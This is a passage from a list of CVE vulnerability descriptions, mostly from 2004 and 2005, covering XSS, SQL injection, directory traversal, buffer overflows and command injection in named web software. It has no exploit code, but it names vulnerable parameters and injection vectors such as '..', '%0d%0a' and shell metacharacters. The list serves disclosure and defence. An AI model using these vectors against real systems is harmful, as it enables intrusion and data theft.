elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0049] Windows SharePoint Services and SharePoint Team Services for Windows Server 2003 does not properly validate an HTTP redirection query, which allows remote attackers to inject arbitrary HTML and web script via a cross-site scripting (XSS) attack, or to spoof the web cache. [CVE-2005-0040] Multiple cross-site scripting (XSS) vulnerabilities in DotNetNuke before 3.0.12 allow remote attackers to inject arbitrary web script or HTML via the (1) register a new user page, (2) User-Agent, or (3) Username, which is not properly quoted before sending to the error log. [CVE-2005-0035] The Acrobat web control in Adobe Acrobat and Acrobat Reader 7.0 and earlier, when used with Internet Explorer, allows remote attackers to determine the existence of arbitrary files via the LoadFile ActiveX method. [CVE-2005-0011] Multiple vulnerabilities in fliccd, when installed setuid root as part of the kdeedu Kstars support for Instrument Neutral Distributed Interface (INDI) in KDE 3.3 to 3.3.2, allow local users and remote attackers to execute arbitrary code via stack-based buffer overflows. [CVE-2004-2766] Webmail in Sun ONE Messaging Server 6.1 and iPlanet Messaging Server 5.2 before 5.2hf2.02 allows remote attackers to obtain unspecified "access" to e-mail via a crafted e-mail message, related to a "session hijacking" issue, a different vulnerability than CVE-2005-2022 and CVE-2006-5486. [CVE-2004-2765] Cross-site scripting (XSS) vulnerability in Webmail in Sun ONE Messaging Server 6.1 and iPlanet Messaging Server 5.2 before 5.2hf2.02, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via a crafted e-mail message, a different vulnerability than CVE-2005-2022 and CVE-2006-5486. [CVE-2004-2763] The default configuration of Sun ONE/iPlanet Web Server 4.1 SP1 through SP12 and 6.0 SP1 through SP5 responds to the HTTP TRACE request, which can allow remote attackers to steal information using cross-site tracing (XST) attacks in applications that are vulnerable to cross-site scripting. [CVE-2004-2757] Cross-site scripting (XSS) vulnerability in the failed login page in Novell iChain before 2.2 build 2.2.113 and 2.3 First Customer Ship (FCS) allows remote attackers to inject arbitrary web script or HTML via url parameter. [CVE-2004-2756] Cross-site scripting (XSS) vulnerability in viewtopic.php in Xoops 2.x, possibly 2 through 2.0.5, allows remote attackers to inject arbitrary web script or HTML via the (1) forum and (2) topic_id parameters. [CVE-2004-2755] Cross-site scripting (XSS) vulnerability in Symantec Web Security 2.5, 3.0.0, and 3.0.1 before build 62 allows remote attackers to inject arbitrary web script or HTML via the query string in blocked URLs that are listed in (1) error or (2) block page messages. [CVE-2004-2752] Cross-site scripting (XSS) vulnerability in the Downloads module in PostNuke up to 0.726, and possibly later versions, allows remote attackers to inject arbitrary HTML and web script via the ttitle parameter in a viewdownloaddetails action. [CVE-2004-2748] viewreport.pl in NetIQ WebTrends Reporting Center Enterprise Edition 6.1a allows remote attackers to determine the installation path via an invalid profileid parameter, which leaks the pathname in an error message. [CVE-2004-2742] Cross-site scripting (XSS) vulnerability in the report viewer in Crystal Enterprise 8.5, 9, and 10 allows remote attackers to inject arbitrary web script or HTML via script in the URL to a report (RPT) file. [CVE-2004-2741] Cross-site scripting (XSS) vulnerability in the "help window" (help.php) in Horde Application Framework 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) module, (2) topic, or (3) module parameters. [CVE-2004-2738] Cross-site scripting (XSS) vulnerability in check_user_id.php in ZeroBoard 4.1pl4 and earlier allows remote attackers to inject arbitrary web script or HTML via the user_id parameter. [CVE-2004-2735] Cross-site scripting (XSS) vulnerability in P4DB 2.01 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) SET_PREFERENCES parameter in SetPreferences.cgi [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder. [CVE-2004-2733] Web Wiz Forums 7.7a uses invalid logic to determine user privileges, which allows remote attackers to (1) block arbitrary IP addresses via pop_up_ip_blocking.asp or (2) modify topics via pop_up_topic_admin.asp. [CVE-2004-2725] Multiple cross-site scripting (XSS) vulnerabilities in Aztek Forum 4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the search parameter in (a) search.php, (2) the email parameter in (b) subscribe.php, and (3) the return and (4) title parameters in (c) forum_2.php. [CVE-2004-2720] Cross-site scripting (XSS) vulnerability in register.asp in Snitz Forums 2000 3.4.04 and earlier allows remote attackers to inject arbitrary web script or HTML via javascript events in the Email parameter. [CVE-2004-2702] Cross-site scripting (XSS) vulnerability in login_up.php3 in Plesk 7.0 and 7.1 Reloaded allows remote attackers to inject arbitrary web script or HTML via the login_name parameter. NOTE: this might be the same vector as CVE-2006-6451. [CVE-2004-2701] Cross-site scripting (XSS) vulnerability in signin.aspx for AspDotNetStorefront 3.3 allows remote attackers to inject arbitrary web script or HTML via the returnurl parameter. [CVE-2004-2696] BEA WebLogic Server and WebLogic Express 6.1, 7.0, and 8.1, when using Remote Method Invocation (RMI) over Internet Inter-ORB Protocol (IIOP), does not properly handle when multiple logins for different users coming from the same client, which could cause an "unexpected user identity" to be used in an RMI call. [CVE-2004-2688] Cross-site scripting (XSS) vulnerability in index.php in NewsPHP allows remote attackers to inject arbitrary web script or HTML via the cat_id parameter. NOTE: this issue might overlap vector 3 in CVE-2006-3358. [CVE-2004-2676] The Spy Sweeper Enterprise Client (SpySweeperTray.exe) in WebRoot Spy Sweeper before 2.0 does not drop privileges when using the help functionality, which allows local users to gain privileges. [CVE-2004-2670] Multiple cross-site scripting (XSS) vulnerabilities in mod.php in eNdonesia 8.3 allow remote attackers to inject arbitrary web script or HTML via (1) the mod parameter in a viewcat operation or (2) the query parameter in a search operation in the publisher module. [CVE-2004-2667] Cross-site scripting (XSS) vulnerability in Lotus Domino 6.0.x before 6.0.4 and 6.5.x before 6.5.2 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2004-2662] Soft3304 04WebServer before 1.41 allows remote attackers to cause a denial of service (resource consumption or crash) via certain data related to OpenSSL, which causes a thread to terminate but continue to hold resources. [CVE-2004-2661] Soft3304 04WebServer before 1.41 does not properly check file names, which allows remote attackers to obtain sensitive information (CGI source code). [CVE-2004-2657] DISPUTED Mozilla Firefox 1.5.0.1, and possibly other versions, preserves some records of user activity even after uninstalling, which allows local users who share a Windows profile to view the records after a new installation of Firefox, as reported for the list of Passwords Never Saved web sites. NOTE: The vendor has disputed this issue, stating that "The uninstaller is primarily there to uninstall the application. It is not there to uninstall user data. For the moment I will stick by my module-owner decision." [CVE-2004-2656] Multiple cross-site scripting (XSS) vulnerabilities in Slashdot Like Automated Storytelling Homepage (Slash) (aka Slashcode) before R_2_5_0_41 allow remote attackers to inject arbitrary web script or HTML via (1) the topic parameter in search.pl and (2) the filter parameter in submit.pl. [CVE-2004-2654] The clientAbortBody function in client_side.c in Squid Web Proxy Cache before 2.6 STABLE6 allows remote attackers to cause a denial of service (segmentation fault) via unspecified vectors that trigger a null dereference. NOTE: in a followup advisory, a researcher claimed that the issue was a buffer overflow that was not fixed in STABLE6. However, the vendor's bug report clearly shows that the researcher later retracted this claim, because the tested product was actually STABLE5. [CVE-2004-2651] Multiple cross-site scripting (XSS) vulnerabilities in YaCy before 0.32 allow remote attackers to inject arbitrary web script or HTML via the (1) urlmaskfilter parameter to index.html or the (2) page parameter to Wiki.html. [CVE-2004-2647] Free Web Chat 2.0 allows remote attackers to cause a denial of service (CPU consumption) via multiple connections from the same user. [CVE-2004-2646] The addUser function in UserManager.java in Free Web Chat 2.0 allows remote attackers to cause a denial of service (uncaught NullPointerException) via unknown attack vectors that cause the usrName variable to be null. [CVE-2004-2636] TinyWeb 1.9 allows remote attackers to read source code of scripts via "/./" in the URL. [CVE-2004-2635] An ActiveX control for McAfee Security Installer Control System 4.0.0.81 allows remote attackers to access the Windows registry via web pages that use the control's RegQueryValue() method. [CVE-2004-2625] Cross-site scripting (XSS) vulnerability in Outblaze Email allows remote attackers to inject arbitrary web script or HTML via Javascript in an attribute of an IMG tag. [CVE-2004-2624] Cross-site scripting (XSS) vulnerability in "TextSearch" in WackoWiki 3.5 allows remote attackers to inject arbitrary web script or HTML via the "phrase" parameter. [CVE-2004-2618] Cross-site scripting (XSS) vulnerability in Pegasi Web Server (PWS) 0.2.2 allows remote attackers to inject arbitrary web script or HTML via the URI, directly after the initial '/' (slash). [CVE-2004-2617] Directory traversal vulnerability in Pegasi Web Server (PWS) 0.2.2 allows remote attackers to read files outside of the web root via a .. (dot dot) directly after the initial '/' (slash) in the URI. [CVE-2004-2614] Buffer overflow in MyWeb 3.3 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request. [CVE-2004-2608] SmartWebby Smart Guest Book stores SmartGuestBook.mdb (aka the "news database") under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the unencrypted username and password of the administrator's account. [CVE-2004-2604] Cross-site scripting (XSS) vulnerability in index.php in PHProxy allows remote attackers to inject arbitrary web script or HTML via the error parameter. [CVE-2004-2603] Cross-site scripting (XSS) vulnerability in the Search module in UberTec Help Center Live (HCL) allows remote attackers to inject arbitrary web script or HTML via the find parameter to index.php. [CVE-2004-2600] The firmware for Intelligent Platform Management Interface (IPMI) 1.5-based Intel Server Boards and Platforms is shipped with an Authentication Type Enables parameter set to an invalid None parameter, which allows remote attackers to obtain sensitive information when LAN management functionality is enabled. [CVE-2004-2588] Intentional information leak in phpinfo.php in XMB (aka extreme message board) 1.9 beta (aka Nexus beta) allows remote attackers to obtain sensitive information such as the configuration of the web server and the PHP application. [CVE-2004-2585] Cross-site scripting (XSS) vulnerability in frmCompose.aspx in SmarterTools SmarterMail 1.6.1511 and 1.6.1529 allows remote attackers to inject arbitrary web script or HTML via Javascript to the "check spelling" feature in the compose area. [CVE-2004-2577] The acl_check function in phpGroupWare 0.9.16RC2 always returns True, even when mkdir does not behave as expected, which could allow remote attackers to obtain sensitive information via WebDAV from users' home directories that lack .htaccess files, and possibly has other unknown impacts. [CVE-2004-2574] Cross-site scripting (XSS) vulnerability in index.php in phpGroupWare 0.9.14.005 and earlier allows remote attackers to inject arbitrary web script or HTML via the date parameter in a calendar.uicalendar.planner menuaction. [CVE-2004-2572] AMAX Magic Winmail Server 3.6 allows remote attackers to obtain sensitive information by entering (1) invalid characters such as "()" or (2) a large number of characters in the Lookup field on the netaddressbook.php web form, which reveals the path in an ldaplib.php error message when the ldap_search function fails, due to improper processing of the $keyword variable. [CVE-2004-2568] Multiple cross-site scripting (XSS) vulnerabilities in ReciPants 1.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) user id, (2) recipe id, (3) category id, and (4) other ID number fields. [CVE-2004-2566] Multiple cross-site scripting (XSS) vulnerabilities in LiveWorld products, possibly including (1) LiveForum, (2) LiveQ&A, (3) LiveChat, and (4) LiveFocusGroup, allow remote attackers to inject arbitrary web script or HTML via the q parameter in (a) search.jsp, (b) findclub!execute.jspa, and (c) search!execute.jspa. [CVE-2004-2564] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in show.asp and (2) the title parameter in showperf.asp. [CVE-2004-2562] SQL injection vulnerability in jobedit.asp in Leigh Business Enterprises (LBE) Web Helpdesk before 4.0.0.81 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2004-2561] Multiple SQL injection vulnerabilities in Internet Software Sciences Web+Center 4.0.1 allow remote attackers to execute arbitrary SQL commands via (1) the ISS_TECH_CENTER_LOGIN cookie in search.asp and (2) one or more cookies in DoCustomerOptions.asp. [CVE-2004-2560] DokuWiki before 2004-10-19, when used on a web server that permits execution based on file extension, allows remote attackers to execute arbitrary code by uploading a file with an appropriate extension such as ".php" or ".cgi". [CVE-2004-2558] Unspecified vulnerability in IBM Tivoli SecureWay Policy Director 3.8, Access Manager for e-business 3.9 to 5.1, Access Manager Identity Manager Solution 5.1, Configuration Manager 4.2, Configuration Manager for Automated Teller Machines 2.1.0, and IBM WebSphere Everyplace Server, Service Provider Offering for Multi-platforms 2.1.3 to 2.15 allow remote attackers to hijack sessions of authenticated users via unknown attack vectors involving certain cookies, aka "Potential Credential Impersonation Attack." [CVE-2004-2550] Multiple cross-site scripting (XSS) vulnerabilities in unspecified Perl scripts in SandSurfer before 1.7.1 allow remote attackers to inject arbitrary web script or HTML, which is later executed by a target who views reports containing the injected data. [CVE-2004-2548] Multiple cross-site scripting (XSS) vulnerabilities in NetWin (1) SurgeMail before 2.0c and (2) WebMail allow remote attackers to inject arbitrary web script or HTML via (a) a URI containing the script, or (b) the username field in the login form. NOTE: it is possible that the first attack vector is resultant from the error message issue (CVE-2004-2547). [CVE-2004-2547] NetWin (1) SurgeMail before 2.0c and (2) WebMail allow remote attackers to obtain sensitive information via HTTP requests that (a) specify the / URI, (b) specify the /scripts/ URI, or (c) specify a non-existent file, which reveal the path in an error message. [CVE-2004-2542] Multiple SQL injection vulnerabilities in Dynix (formerly known as epixtech) WebPAC allow remote attackers to execute arbitrary SQL commands via unknown attack vectors, resulting in an ability to execute stored procedures, bypass login authentication, and cause an unspecified denial of service to backend databases. [CVE-2004-2537] Unspecified vulnerability in SurgeMail before 2.2c10 has unknown impact and attack vectors, related to a "Webmail security bug." [CVE-2004-2528] Cross-site scripting (XSS) vulnerability in sresult.exe in Webcam Watchdog 4.0.1a allows remote attackers to inject arbitrary web script or HTML via the cam parameter. [CVE-2004-2525] Cross-site scripting (XSS) vulnerability in compat.php in Serendipity before 0.7.1 allows remote attackers to inject arbitrary web script or HTML via the searchTerm variable. [CVE-2004-2522] Cross-site scripting (XSS) vulnerability in web.tmpl in Gattaca Server 2003 1.1.10.0 allows remote attackers to inject arbitrary web script or HTML via the (1) template or (2) language parameter. [CVE-2004-2519] Gattaca Server 2003 1.1.10.0 allows remote attackers to cause a denial of service (CPU consumption) via directory specifiers in the LANGUAGE parameter to (1) index.tmpl and (2) web.tmpl, such as (a) slash "/", (b) backslash "\", (c) dot ".",, (d) dot dot "..", and (e) internal slash "lang//en". [CVE-2004-2518] Gattaca Server 2003 1.1.10.0 allows remote attackers to obtain sensitive information via (1) a trailing null byte ("%00") to a URL or (2) an invalid LANGUAGE parameter to web.tmpl, which reveals the full installation path in an error message. [CVE-2004-2514] Cross-site scripting (XSS) vulnerability in modules/private_messages/index.php in PowerPortal 1.x allows remote attackers to inject arbitrary web script or HTML via the (1) SUBJECT or (2) MESSAGE field. [CVE-2004-2512] CRLF injection vulnerability in calendar.php in DCP-Portal 5.3.2 and earlier allows remote attackers to conduct HTTP response splitting attacks to spoof web content and poison web caches via CRLF ("%0d%0a") sequences in the PHPSESSID parameter. [CVE-2004-2511] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 5.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the year, (2) month, and (3) day parameters in calendar.php [CVE-2004-2510] Cross-site scripting (XSS) vulnerability in showflat.php in Infopop UBB.Threads before 6.5 allows remote attackers to inject arbitrary web script or HTML via the Cat parameter. [CVE-2004-2509] Cross-site scripting (XSS) vulnerabilities in (1) calendar.php, (2) login.php, and (3) online.php in Infopop UBB.Threads 6.2.3 and 6.5 allow remote attackers to inject arbitrary web script or HTML via the Cat parameter. [CVE-2004-2508] Cross-site scripting (XSS) vulnerability in main.cgi in Linksys WVC11B Wireless-B Internet Video Camera allows remote attackers to inject arbitrary web script or HTML via the next_file parameter. [CVE-2004-2506] Unparsed web content delivery vulnerability in WIKINDX before 0.9.9g allows remote attackers to obtain sensitive information via a direct HTTP request to the config.inc file. [CVE-2004-2503] INweb Mail Server 2.40 allows remote attackers to cause a denial of service (crash) via a large number of connect/disconnect actions to the (1) POP3 and (2) SMTP services. [CVE-2004-2499] Unspecified vulnerability in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier allows remote attackers to cause a denial of service via unknown attack vectors when a web site is "improperly accessed." [CVE-2004-2498] Unspecified vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to determine internal directory structures via unknown attack vectors. [CVE-2004-2497] Cross-site scripting (XSS) vulnerability in the error handler in Hitachi Web Page Generator and Web Page Generator Enterprise 4.01 and earlier, when using the default error template and debug mode is set to ON, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2004-2495] The (1) Webmail, (2) admin, and (3) SMTP services in Ability Mail Server 1.18 allow remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous connections to the service. [CVE-2004-2494] Cross-site scripting (XSS) vulnerability in _error in Ability Mail Server 1.18 allows remote attackers to inject arbitrary web script or HTML via the erromsg parameter. [CVE-2004-2493] Directory traversal vulnerability in Groupmax World Wide Web (GmaxWWW) 2 and 3, and Desktop 5, 6, and Desktop for Jichitai allows remote authenticated users to read arbitrary .html files via the template name parameter. [CVE-2004-2492] Cross-site scripting (XSS) vulnerability in Groupmax World Wide Web (GmaxWWW) Desktop 5, 6, and Desktop for Jichitai 6, allows remote attackers to inject arbitrary web script or HTML via the QUERY parameter. [CVE-2004-2491] A race condition in Opera web browser 7.53 Build 3850 causes Opera to fill in the address bar before the page has been loaded, which allows remote attackers to spoof the URL in the address bar via the window.open and location.replace HTML parameters, which facilitates phishing attacks. [CVE-2004-2484] Cross-site scripting (XSS) vulnerability in PHP Gift Registry 1.3.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter to (1) event.php or (2) index.php. [CVE-2004-2480] Squid Web Proxy Cache 2.3.STABLE5 allows remote attackers to bypass security controls and access arbitrary websites via "@@" sequences in a URL within Internet Explorer. [CVE-2004-2479] Squid Web Proxy Cache 2.5 might allow remote attackers to obtain sensitive information via URLs containing invalid hostnames that cause DNS operations to fail, which results in references to previously used error messages. [CVE-2004-2478] Unspecified vulnerability in Jetty HTTP Server, as used in (1) IBM Trading Partner Interchange before 4.2.4, (2) CA Unicenter Web Services Distributed Management (WSDM) before 3.11, and possibly other products, allows remote attackers to read arbitrary files via a .. (dot dot) in the URL. [CVE-2004-2475] Cross-site scripting (XSS) vulnerability in Google Toolbar 2.0.114.1 allows remote attackers to inject arbitrary web script via about.html in the About section. NOTE: some followup posts suggest that the demonstration code's use of the res:// protocol does not cross privilege boundaries, since it is not allowed in the Internet Zone. Thus this might not be a vulnerability. [CVE-2004-2468] Cross-site scripting (XSS) vulnerability in SillySearch 2.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter. [CVE-2004-2465] Cross-site scripting (XSS) vulnerability in chat.ghp in Easy Chat Server 1.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2004-2463] Buffer overflow in ADA Image Server (ImgSvr) 0.4 allows remote attackers to cause a denial of service (web server crash) or execute arbitrary code via a long GET request. [CVE-2004-2458] Open WebMail 2.30 and earlier, when use_syshomedir is disabled or create_syshomedir is enabled, creates new directories before authenticating, which allows remote attackers to create arbitrary directories. [CVE-2004-2448] S-Mart Shopping Cart or RediCart 3.9.5b stores smart.cfg under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the database name. [CVE-2004-2447] Cross-site scripting (XSS) vulnerability in 1st Class Mail Server 4.01 allows remote attackers to inject arbitrary web script or HTML via the Mailbox parameter to (1) viewmail.tagz, (2) the index script under /user/, (3) members.tagz, (4) general.tagz, (5) advanced.tagz, or (6) list.tagz. [CVE-2004-2444] Cross-site scripting (XSS) vulnerability in index.php in Jaws 0.3 allows remote attackers to inject arbitrary web script or HTML via the action parameter. [CVE-2004-2438] Cross-site scripting (XSS) vulnerability in PHP-Fusion 4.01 allows remote attackers to inject arbitrary web script or HTML via the (1) Submit News, (2) Submit Link or (3) Submit Article field. [CVE-2004-2435] Cross-site scripting (XSS) vulnerability in PeopleSoft Human Resources Management System (HRMS) 7.0, when "web enabled" using HTML Access, allows remote attackers to inject arbitrary web script or HTML via unspecified (1) debugging or (2) utility scripts. [CVE-2004-2428] Abczone.it WWWguestbook 1.1 stores db/dbase.mdb under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as the plaintext username and password. [CVE-2004-2424] BEA WebLogic Server and WebLogic Express 8.1 through 8.1 SP2 allow remote attackers to cause a denial of service (network port comsumption) via unknown actions in HTTPS sessions, which prevents the server from releasing the network port when the session ends. [CVE-2004-2423] Unknown vulnerability in the Web calendaring component of Ipswitch IMail Server before 8.13 allows remote attackers to cause a denial of service (crash) via "specific content." [CVE-2004-2422] Multiple features in Ipswitch IMail Server before 8.13 allow remote attackers to cause a denial of service (crash) via (1) a long sender field to the Queue Manager or (2) a long To field to the Web Messaging component. [CVE-2004-2402] Cross-site scripting (XSS) vulnerability in YaBB.pl in YaBB 1 GOLD SP 1.3.2 allows remote attackers to inject arbitrary web script or HTML via a hex-encoded to parameter. NOTE: some sources say that the board parameter is affected, but this is incorrect. [CVE-2004-2401] Stack-based buffer overflow in Ipswitch IMail Express Web Messaging before 8.05 might allow remote attackers to execute arbitrary code via an HTML message with long "tag text." [CVE-2004-2397] The web-based Management Console in Blue Coat Security Gateway OS 3.0 through 3.1.3.13 and 3.2.1, when importing a private key, stores the key and its passphrase in plaintext in a log file, which allows attackers to steal digital certificates. [CVE-2004-2385] EMU Webmail 5.2.7 allows remote attackers to obtain sensitive path information (home directory) via an HTTP request for init.emu. [CVE-2004-2380] Directory traversal vulnerability in postfile.exe for Twilight Utilities Web Server 2.0.0.0 allows remote attackers to write arbitrary files via a .. (dot dot) in the attfile parameter. [CVE-2004-2379] Multiple cross-site scripting (XSS) vulnerabilities in @Mail 3.64 for Windows allow remote attackers to inject arbitrary web script or HTML via (1) the Displayed Name attribute in util.pl and (2) the Folder attribute in showmail.pl. [CVE-2004-2376] Buffer overflow in postfile.exe for Twilight Utilities Web Server 2.0.0.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL request with a long attfile attribute. [CVE-2004-2371] Multiple Red Storm web-based games, including Ghost Recon 1.4 and earlier, Desert Siege, and The Sum of all Fears 1.1.1.0 and earlier, do not properly check return values from certain functions, which allows remote attackers to cause a denial of service (hang) via packets that contain text strings with incorrect size values. [CVE-2004-2369] Directory traversal vulnerability in webadmin.nsf for Lotus Domino R6 6.5.1 allows attackers to create and detect directories via a .. (dot dot) in the directory creation command. [CVE-2004-2358] Cross-site scripting (XSS) vulnerability in admin_words.php for phpBB 2.0.6c allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2004-2356] Early termination vulnerability in Fizmez Web Server 1.0 allows remote attackers to cause a denial of service (crash) by connecting to the server and then disconnecting without sending any data, which triggers a null pointer dereference. [CVE-2004-2355] Cross-site scripting (XSS) vulnerability in Crafty Syntax Live Help (CSLH) before 2.7.4 allows remote attackers to inject arbitrary web script or HTML via the name field of a livehelp or chat session. [CVE-2004-2353] BugPort before 1.099 stores its configuration file (conf/config.conf) under the web document root with a file extension that is not normally parsed by web servers, which allows remote attackers to obtain sensitive information. [CVE-2004-2352] Cross-site scripting (XSS) vulnerability in GBook for PHP-Nuke 1.0 allows remote attackers to inject arbitrary web script or HTML via cookies that are stored in the $_COOKIE PHP variable, which is not cleansed by PHP-Nuke. [CVE-2004-2351] Cross-site scripting (XSS) vulnerability in GBook for Php-Nuke 1.0 allows remote attackers to inject arbitrary web script or HTML via multiple parameters, including (1) name, (2) email, (3) city, and (4) message, which do not use the <script> and <style> tags, which are filtered by PHP-Nuke. [CVE-2004-2347] blog.cgi in Leif M. Wright Web Blog 1.1 and 1.1.5 allows remote attackers to execute arbitrary commands via shell metacharacters such as '\|' in the file parameter of ViewFile requests. [CVE-2004-2346] Multiple cross-site scripting (XSS) vulnerabilities in Forum Web Server 1.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the Subject field in post1.htm and (2) the File Description field in postfile2.htm. [CVE-2004-2343] DISPUTED Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument. [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server. [CVE-2004-2334] Multiple cross-site scripting (XSS) vulnerabilities in EMU Webmail 5.2.7 allow remote attackers to inject arbitrary web script or HTML via (1) a hex-encoded value to the variable parameter in emumail.fcgi, (2) the folder parameter in emumail.fcgi, or Javascript in the (3) username or (4) password field in the login page. [CVE-2004-2332] Multiple cross-site scripting (XSS) vulnerabilities in CPAN WWW::Form before 1.13 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2004-2327] Vizer Web Server 1.9.1 allows remote attackers to cause a denial of service (crash) via multiple malformed requests including (1) requests without GET, (2) GET requests without HTTP, (3) or long GET requests. [CVE-2004-2325] Cross-site scripting (XSS) vulnerability in EditModule.aspx for DotNetNuke (formerly IBuySpy Workshop) 1.0.6 through 1.0.10d allows remote attackers to inject arbitrary web script or HTML. [CVE-2004-2323] DotNetNuke (formerly IBuySpy Workshop) 1.0.6 through 1.0.10d allows remote attackers to obtain sensitive information, including the SQL server username and password, via a GET request for source or configuration files such as Web.config. [CVE-2004-2322] SQL injection vulnerability in the (1) announce and (2) notes modules of phpWebSite before 0.9.3-2 allows remote attackers to execute arbitrary SQL queries, as demonstrated using the ANN_id parameter to the announce module. [CVE-2004-2321] BEA WebLogic Server and Express 8.1 SP1 and earlier allows local users in the Operator role to obtain administrator passwords via MBean attributes, including (1) ServerStartMBean.Password and (2) NodeManagerMBean.CertificatePassword. [CVE-2004-2320] The default configuration of BEA WebLogic Server and Express 8.1 SP2 and earlier, 7.0 SP4 and earlier, 6.1 through SP6, and 5.1 through SP13 responds to the HTTP TRACE request, which can allow remote attackers to steal information using cross-site tracing (XST) attacks in applications that are vulnerable to cross-site scripting. [CVE-2004-2318] The administrative interface (surgeftpmgr.cgi) for SurgeFTP Server 1.0b through 2.2k1 allows remote attackers to cause a temporary denial of service (crash) via requests with two percent (%) signs in the CMD parameter. [CVE-2004-2317] Information leak in Mbedthis AppWeb HTTP server 1.0 through 1.1.2 allows remote attackers to obtain sensitive information via a user message that is generated when Mbedthis denies access. [CVE-2004-2316] Mbedthis AppWeb HTTP server before 1.0.2 allows remote attackers to cause a denial of service (crash) via a GET request containing an MS-DOS device name such as COM1. [CVE-2004-2315] Mbedthis AppWeb HTTP server before 1.0.2 allows remote attackers to cause a denial of service (crash) via an empty OPTIONS request. [CVE-2004-2313] Inter7 SqWebMail 3.4.1 through 3.6.1 generates different error messages for incorrect passwords versus correct passwords on non-mail-enabled accounts (such as root), which allows remote attackers to guess the root password via brute force attacks. [CVE-2004-2311] Directory traversal vulnerability in webadmin.nsf in Lotus Domino R6 6.5.1 allows local users to create folders or determine the existence of files via a .. (dot dot) in the new folder dialog. [CVE-2004-2310] Cross-site scripting (XSS) vulnerability in webadmin.nsf in Lotus Domino R6 6.5.1 allows remote attackers to inject arbitrary web script or HTML via a Domino command in the Quick Console. [CVE-2004-2308] Cross-site scripting (XSS) vulnerability in cPanel 9.1.0 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the dir parameter in dohtaccess.html. [CVE-2004-2294] Canonicalize-before-filter error in the send_review function in the Reviews module for PHP-Nuke 6.0 to 7.3 allows remote attackers to inject arbitrary web script or HTML via hex-encoded XSS sequences in the text parameter, which is checked for dangerous sequences before it is canonicalized, leading to a cross-site scripting (XSS) vulnerability. [CVE-2004-2293] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.0 to 7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) eid parameter or (2) query parameter to the Encyclopedia module, (3) preview_review function in the Reviews module as demonstrated by the url, cover, rlanguage, and hits parameters, or (4) savecomment function in the Reviews module, as demonstrated using the uname parameter. NOTE: the Faq/categories and Encyclopedia/ltr issues are already covered by CVE-2005-1023. [CVE-2004-2288] Cross-site scripting (XSS) vulnerability in index.php in Jelsoft vBulletin allows remote attackers to spoof parts of a website via the loc parameter. [CVE-2004-2287] Directory traversal vulnerability in explorer.php in DSM Light Web File Browser 2.0 allows remote attackers to read arbitrary files via .. (dot dot) in the wdir parameter. [CVE-2004-2284] The read_list_from_file function in vacation.pl for OpenWebmail before 2.32 20040629 allows remote attackers to execute arbitrary commands via shell metacharacters in a filename argument. [CVE-2004-2278] Unknown cross-site scripting (XSS) vulnerability in the web GUI in vHost before 3.10r1 has unknown impact and attack vectors. [CVE-2004-2267] Cross-site scripting (XSS) vulnerability in Ansel 2.1 and earlier allows remote attackers to inject arbitrary HTML or web script via the album name. [CVE-2004-2254] SurgeLDAP 1.0g (Build 12), and possibly other versions before 1.0h, allows remote attackers to bypass authentication for the administration interface via a direct request to admin.cgi with a modified utoken parameter. [CVE-2004-2246] Cross-site scripting (XSS) vulnerability in Goollery before 0.04b allows remote attackers to inject arbitrary HTML or web script via the conversation_id parameter to viewpic.php. [CVE-2004-2245] Cross-site scripting (XSS) vulnerability in Goollery 0.03 allows remote attackers to inject arbitrary HTML or web script via the (1) page parameter to viewalbum.php or (2) btopage parameter to viewpic.php. [CVE-2004-2242] Cross-site scripting (XSS) vulnerability in search.php in Phorum, possibly 5.0.7 beta and earlier, allows remote attackers to inject arbitrary HTML or web script via the subject parameter. [CVE-2004-2241] Cross-site scripting (XSS) vulnerability in Phorum 5.0.11 and earlier allows remote attackers to inject arbitrary HTML or web script via search.php. NOTE: some sources have reported that the affected file is read.php, but this is inconsistent with the vendor's patch. [CVE-2004-2218] SQL injection vulnerability in pmwh.php in PHPMyWebHosting 0.3.4 and earlier allows remote attackers to modify SQL statements via the password parameter. [CVE-2004-2216] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier and 6.1 SP1 and earlier, and 